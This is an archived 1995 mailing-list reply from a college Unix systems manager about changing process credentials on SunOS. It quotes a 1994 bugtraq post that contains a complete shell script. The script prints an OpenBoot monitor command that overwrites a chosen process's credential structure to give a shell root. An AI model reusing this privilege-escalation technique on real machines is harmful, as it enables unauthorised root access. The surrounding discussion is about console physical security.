Re: Pointer to a process's credential structure?
Scott Fritchie (fritchie@FreeNet.MSP.MN.US)
Fri, 14 Apr 1995 13:47:26 -0500
>>>>> On Fri, 14 Apr 1995 09:17:25 +0800, patrick@oes.amdahl.com (Patrick Horgan) said:
> Browsing through some archived "bugtraq" messages I discovered a
> really nifty way to change the effective and real userid of any
> process running under SunOS 4.1.x (well, at least 4.1.2 and 4.1.3x).
> That particular hole is demonstrably exploitable under Solaris 2.3
> (and I assume Solaris 2.4), except for one little problem....
>
ph> I'd have to think...we used to be able to do this via the prom
ph> debugger.
I'll attach the message I found browsing spy.org's Web server at the
end of this one. It will probably be a good memory refresher. :-)
ph> We wouldn't have to know any address ahead of time, but
ph> could walk the kernels tables in the debugger from the prom
ph> prompt.
I'd thought of that, too. More work, though -- SunOS 4's "pstat" is
so kind to give almost the exact address needed.
ph> I'd hope everyone knows
ph> that physical security is important, and that if you don't have it
ph> your in deep doo-doo.
You've got a point there. At St. Olaf, we've got our machines
"protected" by the root password if you attempt to boot into
single-user mode (and haven't really cared all that much if someone
went to the trouble of bringing their own Sun-style-bootable drive),
but finding out about the monitor attack was a cool (in a twisted
sense) discovery. "eeprom security-mode=command (?)", here we come.
-Scott
---
Scott E. Lystig Fritchie, UNIX Systems Manager Co-founder:
Academic Computing Center, St. Olaf College Twin Cities Free-Net
1510 St. Olaf Ave., Northfield, MN 55057 Organizing Committee
fritchie@stolaf.edu ... 507/646.3407 (Minneapolis/St. Paul, MN)
"Activism is the killer app for the net." -- Steven Cherry <stc@panix.com>
--- snip --- snip --- snip --- snip --- snip --- snip --- snip --- snip ---
#!/bin/sh -
# From: an100188@anon.penet.fi
# Subject: Breaking in from the monitor at the console
# Date: Fri, 27 May 1994 15:34:36 UTC
# To: bugtraq@crimelab.com
#
# Breaking into a machine, typically a workstation, by using the monitor
# at the console to poke values into memory has always been possible. I
# didn't realize how simple and unobtrusive it was before I saw this
# script. This one is for Suns, but the principle applies to any
# machine with a console monitor. On Sun4s there is some sort of
# "secure mode" that I presume lets you disable the monitor. It is
# possible to change the L1-A sequence to another pair of keys, but if
# you own /dev/console you can change it back. This obscurity may or
# may not be useful.
#
# This particular attack needs a way to run the script on the machine,
# typically in a shell. I presume there are other spots where you could
# tickle a machine that don't even require that. Physically secure
# consoles prevent this attack.
#
# Sigh.
#
# ----------------------------------------------------------------------------
#
# Subject: Re: Breaking in from the monitor at the console
# Date: Sat, 28 May 1994 10:15:52 UTC
# To: bugtraq@crimelab.com
#
# Oops, someone pointed out that the script was deleted by the anonymous
# mail signature-remover. Sorry about that. Here's the script:
#
#
#
# Program: fc-4.1.3
# Author: Anonymous
# Usage: fc-4.1.3 PID
# PID is the PID of the shell you wish to give root to.
#
# Description:
# Tell people how to give themselves root (on SunOS 4.1.3 machines)
#
# Give the program a known path
PATH="/bin:/usr/etc:/usr/ucb"
export PATH
if [ $1x = x ]; then
cat - << EOF
Usage: $0 PID
Where PID is the PID of the shell you want to give root to.
Note - for csh the PID is stored in \$\$.
EOF
exit 1
fi
# This is the start of the proc structure for a given PID.
procp=`pstat -u $1 | grep procp | cut -f2`
# This is really the only important information here.
# This number is the offset of the pointer to the cred structure
# in the proc structure.
ucred="4c"
cat - << EOF
On the console press '<L1>a', you should see then see the following message:
Type 'go' to resume
ok
type the following at the 'ok' prompt:
b 2 do 0 $procp $ucred + l@ i + w! 2 +loop
go
Notes:
* On some sun keyboards the '<L1>' key is labeled 'Stop'.
* There is Emacs style line editing available at the 'ok' prompt.
EOF
exit 0